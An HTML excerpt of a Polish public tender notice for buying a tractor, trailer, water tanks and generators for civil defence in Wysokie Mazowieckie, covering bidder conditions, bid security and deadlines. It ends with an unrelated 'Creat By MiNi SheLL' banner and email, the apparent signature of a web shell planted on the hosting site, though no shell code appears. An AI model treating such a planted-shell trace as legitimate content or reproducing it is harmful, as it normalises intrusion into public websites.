wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego w niniejszym rozdziale warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie wymaga spełnienia warunku.<br/>2)	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej :<br/>Zamawiający nie wymaga spełnienia warunku.<br/>3)	sytuacji ekonomicznej lub finansowej,<br/>Zamawiający nie wymaga spełnienia warunku.<br/>4)	zdolności technicznej lub zawodowej. <br/>2.	W zakresie zdolności technicznej lub zawodowej o udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający szczegółowe warunki udziału w postępowaniu, tj.:<br/>1)	wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że wykonał w okresie ostatnich 3 lat przed upływam terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym czasie, wykonał należycie co najmniej:<br/>- jedną dostawę sprzętu o wartości 100 000,00 zł brutto ( w przypadku składania ofert na dostawę ciągnika i przyczepy)<br/>-jedną dostawę sprzętu o wartości 50 000,00 zł brutto ( w przypadku składania ofert na dostawę cystern)<br/>jedną dostawę sprzętu o wartości 50 000,00 zł brutto ( w przypadku składania ofert na dostawę agregatów prądotwórczych)<br/> Zamawiający nie określa rodzaju sprzętu w dostawie.<br/><br/>Opis sposobu dokonywania oceny spełnienia tego warunku<br/>Ocena spełnienia tego warunku zostanie przeprowadzona w formule spełnia/nie spełnia w oparciu o informacje zawarte w oświadczeniu o spełnieniu warunków udziału w postępowaniu .<br/><br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 3 (składany na wezwanie, stosownie do treści art. 274 ust. 1 upzp). Zakres ww. dokumentu musi potwierdzać spełnienie warunku określonego w Rozdziale X pkt 2.1 SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca zobowiązany jest złożyć wraz z ofertą następujące oświadczenia:<br/>1)	aktualne na dzień składania ofert oświadczenia, o których mowa w art. 125 ust1 ustawy Pzp, zawierające w szczególności informacje:<br/>a) o tym, że Wykonawca nie podlega wykluczeniu z powodów wskazanych w Rozdziale XI SWZ, wg. wzoru stanowiącego Załącznik nr 2a do SWZ<br/>b) o tym, że Wykonawca spełnia warunki udziału w postępowaniu określone przez Zamawiającego w Rozdziale X SWZ - wg. wzoru stanowiącego Załącznik nr 2b do SWZ<br/>2)	zobowiązanie podmiotu udostępniającego wykonawcy zasoby na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w przypadku wykonawcy, który wykazując spełnienie warunków udziału w postepowaniu, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, o tym których warunków dotyczą udostępniane przez inne podmioty zasoby, – w takiej sytuacji należy złożyć wraz z ofertą załącznik nr 5 ( jeśli dotyczy)<br/>3)	oświadczenia o których mowa w pkt 1 ppkt. 1 podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby - w przypadku polegania wykonawcy na zdolnościach lub sytuacji podmiotów udostępniających zasoby w celu wykazania spełniania warunków udziału w postępowaniu,<br/>4)	oświadczenia o których mowa w pkt 1 ppkt. 1 podwykonawcy niebędącego podmiotem udostępniającym zasoby , potwierdzające brak podstaw wykluczenia tego podwykonawcy - w przypadku, gdy wykonawca wskazał nazwę podwykonawcy,<br/>5)	Wykonawca wspólnie ubiegający się o udzielenie zamówienia wskazuje, które dostawy wykonają poszczególni wykonawcy zgodnie z art.117 ust 4 pzp. – w takiej sytuacji należy złożyć wraz z ofertą załącznik nr 6 (jeśli dotyczy)<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia o którym mowa w pkt 1 ppkt 1, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>3.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 1 ppkt 2, potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/> 3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca <br/> polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, <br/> kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/> wskazane zdolności dotyczą.<br/>4. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy o treści jednoznacznie wskazujący uprawnienia (umocowanie), co najmniej do podpisania i złożenia oferty <br/>( jeśli dotyczy)<br/>Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty i podpisania umowy. <br/>4.	Podmiotowe środki dowodowe żądane od wykonawcy, którego oferta została oceniona najwyżej, składane na wezwanie Zamawiającego:<br/>- wykaz dostaw. Pozostałe informacje zawiera SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości :<br/>Część I Dostawa ciągnika rolniczego i przyczepy ciągnikowej - 3.000,00 zł ( słownie: trzy tysiące zł)<br/>Część II Dostawa cystern do przewozu wody pitnej - 1.000,00 zł ( słownie: jeden tysiąc zł)<br/>Część III Dostawa mobilnych agregatorów prądotwórczych - 2.000,00 zł ( słownie: dwa tysiące zł)<br/>przed upływem terminu składania ofert określonego w niniejszej SWZ.<br/>2.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości .<br/>Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy 81 1020 1332 0000 1402 0941 7629 prowadzony w banku PKO BP SA O/WYSOKIE MAZOWIECKIE z dopiskiem Wadium - ,, Zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie. Część…..”.<br/><br/>3.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w pkt 3, przed upływem terminu składania ofert.<br/>4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt. 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>5.	Wadium wnoszone w formach określonych w pkt 2 ppkt. 2-4, musi zawierać zobowiązanie gwaranta lub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 98 ust. 6 uPzp, przy czym: <br/>1)	w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań;<br/>2)	dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz Zamawiającego bezwarunkowo i na pierwsze żądanie. <br/>6.	Zamawiający informuje, iż jest obowiązany zatrzymać wadium wraz z odsetkami w przypadku ziszczenia się przesłanek, o których mowa w art. 98 ust. 6 uPzp. <br/>7.	Zamawiający zwróci wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. Zaleca się, aby poręczenie lub gwarancja wskazywały adres mailowy na jaki Zamawiający winien składać oświadczenie o zwolnieniu wadium, o którym mowa w art. 98 ust. 5 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu i braku podstaw do wykluczenia składa każdy z wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmian postanowień umowy bez konieczności przeprowadzenia nowego postepowania o udzielenie zamówienia, z uwzględnieniem przesłanek wskazanych w art.455 ustawy Pzp.<br/>2. Warunki wprowadzenia zmian w umowie są następujące:<br/>a) Działania siły wyższej.<br/>b)Zmiana zaoferowanego przedmiotu zamówienia na inny o parametrach tożsamych lub lepszych <br/> od przyjętych w ofercie w przypadku wycofania z rynku oferowanego sprzętu.<br/>c)Zmian wysokości wynagrodzenia w przypadku zmiany ustawowej stawki VAT oraz podatku akcyzowego<br/> w okresie realizacji umowy – dotyczy wynagrodzenia za dostawy, których nie zafakturowano na dzień <br/> wejścia w życie przepisów o zmianie VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta składana jest pod rygorem nieważności przy pomocy ,,Formularza ofertowego&#34; udostępnionego przez Zamawiajacego na Platfornie e-Zamówienia, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty został opisany w Rozdziale XV SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com